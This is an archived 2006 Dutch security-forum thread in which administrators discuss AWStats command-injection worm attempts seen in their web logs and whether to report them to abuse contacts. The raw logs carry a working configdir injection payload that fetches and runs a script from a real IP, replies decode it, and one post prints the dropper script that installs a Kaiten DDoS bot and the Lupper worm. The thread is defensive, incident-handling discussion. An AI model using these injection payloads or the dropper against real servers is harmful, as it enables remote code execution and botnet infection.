Archief
- De topics van lang geleden
Heeft het zin abuse@.. mailtjes te sturen?
29-01-2006, 16:44 door Anoniem, 15 reacties
Bijvoorbeeld:
193.193.162.71 - - [25/Jan/2006:21:57:02 +0100] "GET /awstats/awstats.pl?
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%
2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%
2fscripz;echo%20YYY;echo| HTTP/1.1" 404 379 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
193.193.162.71 - - [25/Jan/2006:21:57:03 +0100] "GET /cgi-bin/awstats.pl?
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%
2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%
2fscripz;echo%20YYY;echo| HTTP/1.1" 404 379 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
Is niet echt braaf, maar 193.193.etc. is een of andere Russische bak, kan
ik me de moeite besparen?
193.193.162.71 - - [25/Jan/2006:21:57:02 +0100] "GET /awstats/awstats.pl?
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%
2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%
2fscripz;echo%20YYY;echo| HTTP/1.1" 404 379 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
193.193.162.71 - - [25/Jan/2006:21:57:03 +0100] "GET /cgi-bin/awstats.pl?
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%
2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%
2fscripz;echo%20YYY;echo| HTTP/1.1" 404 379 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
Is niet echt braaf, maar 193.193.etc. is een of andere Russische bak, kan
ik me de moeite besparen?
Reacties (15)
31-01-2006, 12:29 door
Jeroen Wijnands
Rusland is meestal niet de moeite tenzij je uit de ripe data
de indruk krijgt dat het een klein bedrijfje is.
de indruk krijgt dat het een klein bedrijfje is.
31-01-2006, 14:46 door
SirDice
da's een worm trouwens.. En ja, gewoon een abuse email sturen.. Als ze er genoeg krijgen gaan ze vanzelf actie ondernemen.. Als iedereen denkt: "Het heeft toch geen zin" en vervolgens niets stuurt zal er ook nooit iets aan gedaan
worden.
Meestal heeft een ISP een netblock van een nog grotere ISP (peering). Die zou je ook kunnen CC'en.
worden.
Meestal heeft een ISP een netblock van een nog grotere ISP (peering). Die zou je ook kunnen CC'en.
Een met Pluppi.B besmette Linux doos, ik zie er een paar honderd per dag
op ons bedrijfsdomein voorbij komen.
Komt binnen via UDP poort 7555, dus goeie firewall zou het al moeten
stoppen en is alleen gevaarlijk voor mensen die een eigen webserver
draaien.
op ons bedrijfsdomein voorbij komen.
Komt binnen via UDP poort 7555, dus goeie firewall zou het al moeten
stoppen en is alleen gevaarlijk voor mensen die een eigen webserver
draaien.
20-02-2006, 16:45 door
SirDice
Een met Pluppi.B besmette Linux doos,
Welke virusscanner ziet 'm als Pluppi? Ik kan er helemaal niets over vinden.Komt binnen via UDP poort 7555, dus goeie firewall zou het al moeten stoppen en is alleen gevaarlijk voor mensen die een eigen webserver draaien.
Als je goed kijkt dan zie je dat ze binnenkomen via tcp poort 80.. Gewoon een command injection.. De commando's zijn: | echo; echo YYY; cd /tmp; wget1.2.3.4/scriptz; chmod +x scriptz; ./scriptz; echo YYY; echo |
Een firewall heeft dus geen zin want ik neem aan dat je je website online wilt houden...
20-02-2006, 17:21 door
Virtal
Door SirDice
niets over vinden.
http://www.virusalert.nl/?show=virus&id=1243&name=Linux.Plupii.B
Een met Pluppi.B besmette Linux doos,
Welke virusscanner ziet 'm als Pluppi? Ik kan er helemaalniets over vinden.
20-02-2006, 17:32 door
SirDice
Ah... Lupii... Maar die is het dus niet... Kijk maar hoe Lupii awstats exploit..
http://www.securityfocus.com/bid/10950/exploit
Dat gebeurd dus wezenlijk anders dan wat hier gepost is...
NB Lupii komt niet binnen via UDP 7555 maar een geinfecteerde doos verzend een signaal over die poort..
http://www.securityfocus.com/bid/10950/exploit
Dat gebeurd dus wezenlijk anders dan wat hier gepost is...
NB Lupii komt niet binnen via UDP 7555 maar een geinfecteerde doos verzend een signaal over die poort..
Wat ik hier vreend vind .... ze zeggen dat het een Linux
virus is, maar bij de verwijder instructies staan
instructies voor verschillende M$ spullen ... ikke nie snap :-)
virus is, maar bij de verwijder instructies staan
instructies voor verschillende M$ spullen ... ikke nie snap :-)
20-02-2006, 20:10 door
Virtal
Dat gebeurd dus wezenlijk anders dan wat hier gepost
is...
Dat gaf je inderdaad eerder aan. is...
Deze methode | echo; echo YYY; cd /tmp; wget
infected_ip/vervelende_code; chmod +x
vervelende_code; ./vervelende_code; echo YYY;
echo | duikt sinds begin november vorig jaar in logfiles
op waarbij het IP en de tenaamstelling van de vervelende
code varieert.
Jongens, jullie vergeten toch niet af en toe contact met
onze aarde te maken he? blieb blieb? Poes moet eten,
boodschappen doen, je weet wel. Lees ook af en toe eens een
gedicht. Of sta eens vroeg op om te zien hoe majestueus de
zon iedere ochtend weer opkomt en vraag verkering aan dat
leuke meisje van de overkant (voordat je helemaal verloren
gaat aan de kompjoeter)
onze aarde te maken he? blieb blieb? Poes moet eten,
boodschappen doen, je weet wel. Lees ook af en toe eens een
gedicht. Of sta eens vroeg op om te zien hoe majestueus de
zon iedere ochtend weer opkomt en vraag verkering aan dat
leuke meisje van de overkant (voordat je helemaal verloren
gaat aan de kompjoeter)
21-02-2006, 09:55 door
SirDice
Anon: Samen met m'n vriendin hebben we 8 poezen, 2 honden en 3 kippen.. Die krijgen altijd netjes op tijd eten.. Gedichten maak ik zelf (voor m'n vriendin).. De ijskast staat vol met lekkere dingen.. En ik zie liever een zonsondergang...
Maar dit soort dingen zijn gewoon leuk.. Beetje jagen op malware. Dat is iets wat ik al zo'n 20 jaar doe waarvan inmiddels al zo'n 10 jaar professioneel.. Noem het beroepsverdwazing..
Maar dit soort dingen zijn gewoon leuk.. Beetje jagen op malware. Dat is iets wat ik al zo'n 20 jaar doe waarvan inmiddels al zo'n 10 jaar professioneel.. Noem het beroepsverdwazing..
Door Vital
duikt sinds begin november vorig jaar in logfiles op waarbij het IP en de tenaamstelling van de vervelende code varieert.
Ja, ik zie 'm ook regelmatig.. IP en script (progje?) veranderd inderdaad wel eens.. Jammer genoeg nog steeds dat ding niet te pakken kunnen krijgen.. Da's jammer want ik wil 'm ontleden..duikt sinds begin november vorig jaar in logfiles op waarbij het IP en de tenaamstelling van de vervelende code varieert.
Door SirDice
Maar dit soort dingen zijn gewoon leuk.. Beetje jagen op malware. Dat is
iets wat ik al zo'n 20 jaar doe waarvan inmiddels al zo'n 10 jaar
professioneel.. Noem het beroepsverdwazing..
Maar dit soort dingen zijn gewoon leuk.. Beetje jagen op malware. Dat is
iets wat ik al zo'n 20 jaar doe waarvan inmiddels al zo'n 10 jaar
professioneel.. Noem het beroepsverdwazing..
Hoe groot is jouw malware zoo ? :-)
AS
21-02-2006, 11:11 door
Virtal
Ja, ik zie 'm ook regelmatig.. IP en script (progje?)
veranderd inderdaad wel eens.. Jammer genoeg nog steeds dat
ding niet te pakken kunnen krijgen.. Da's jammer want ik wil
'm ontleden..
Ik krijg het ding ook niet 'met deveranderd inderdaad wel eens.. Jammer genoeg nog steeds dat
ding niet te pakken kunnen krijgen.. Da's jammer want ik wil
'm ontleden..
hand' te pakken omdat bijvoorbeeld de systemen waar het
vandaan zou moeten komen veelal onbereikbaar zijn (time-out).
Je kunt bijvoorbeeld de errorhandler aanpassen zodat je kan detecteren wanneer je de 'aandacht' ervan hebt en het dan gecontroleerd automatisch kunt proberen te downloaden in quarantaine.
Daarnaast kan Anoniem gerust zijn. Voor dit werk hoef je
niet uit het heelal te komen. Het is mensenwerk.
Ik werk met blackice server protection (ISS), heb homeserver
met win xp en jah ik ben al gestopt met het bannen van
ranges, het is niet bij te houden, elke dag probeert wel
iemand deze worm uit te voeren (ze komen van overal, nl, be,
..), en je hebt er nog andere, en ze doen niet eens de
moeite om te kijken of ik awstats bijvoorbeeld wel heb ...
met win xp en jah ik ben al gestopt met het bannen van
ranges, het is niet bij te houden, elke dag probeert wel
iemand deze worm uit te voeren (ze komen van overal, nl, be,
..), en je hebt er nog andere, en ze doen niet eens de
moeite om te kijken of ik awstats bijvoorbeeld wel heb ...
27-02-2006, 17:32 door
SirDice
Het bannen van ranges is iets anders dan het mailen naar een abuse mailbox..
En waarom zou een worm de moeite nemen om te controleren of je awstats hebt of niet? Het is gewoon fire 'n forget.. Als een server vatbaar is zie je 'm vanzelf wel op een, vooraf ingesteld, IRC kanaal verschijnen..
En waarom zou een worm de moeite nemen om te controleren of je awstats hebt of niet? Het is gewoon fire 'n forget.. Als een server vatbaar is zie je 'm vanzelf wel op een, vooraf ingesteld, IRC kanaal verschijnen..
16-03-2006, 14:35 door
SirDice
Update.. Heb eindelijk het bestandje te pakken wat met wget binnen gehaalt wordt.. Het script heet, in deze 'versie', cacti (ip adres is verwijderd door mij):
#!/bin/bash
wget x.x.x.x/foc
chmod 744 foc
./foc
wget x.x.x.x/iron
chmod 744 iron
./iron
foc is een Kaiten DDoS botje en logt in op IRC (undernet). Iron wordt gedetecteerd door m'n McAfee als Linux/Lupper.worm.b. Het script werkt overigens niet op FreeBSD aangezien die niet standaard is voorzien van bash en wget. Als bash wel is geinstalleerd dan staat deze, op FreeBSD, onder /usr/local/bin/bash. De executables (foc&iron) zijn Linux ELF executables en werken ook niet onder FreeBSD (tenzij je de Linux compatibiliteit aanzet).wget x.x.x.x/foc
chmod 744 foc
./foc
wget x.x.x.x/iron
chmod 744 iron
./iron
Reageren
Deze posting is gelocked. Reageren is niet meer mogelijk.
Digital Designer
Ben jij een Grafisch vormgever, UI-designer, Game-artist of gewoon een ‘self-proclaimed creative genius’, die op zoek is naar een leuke en uitdagende baan waarin je al je creativiteit kwijt kan?Je werkt samen met onze developers en UI/UX-designer aan onze Gamified Cybersecurity Challenges welke jij voorziet van de mooiste designs.
Cyber Security Trainer
"You know that feeling after you have been to the cinema and seen an exciting movie? It's the same after this training. I can only say that this is probably the BEST TRAINING that I've ever done!!!”
Are you ready for a challenge?
Senior Full Stack Developer
Als full stack developer bij Certified Secure maak je de mooiste cybersecurity challenges die onze deelnemers wereldwijd uitdagen en inspireren. Alle challenges zijn gebaseerd op actuele kwetsbaarheden, je komt dus telkens nieuwe technieken tegen, van machine learning tot web assembly, van Swift UI tot GCP.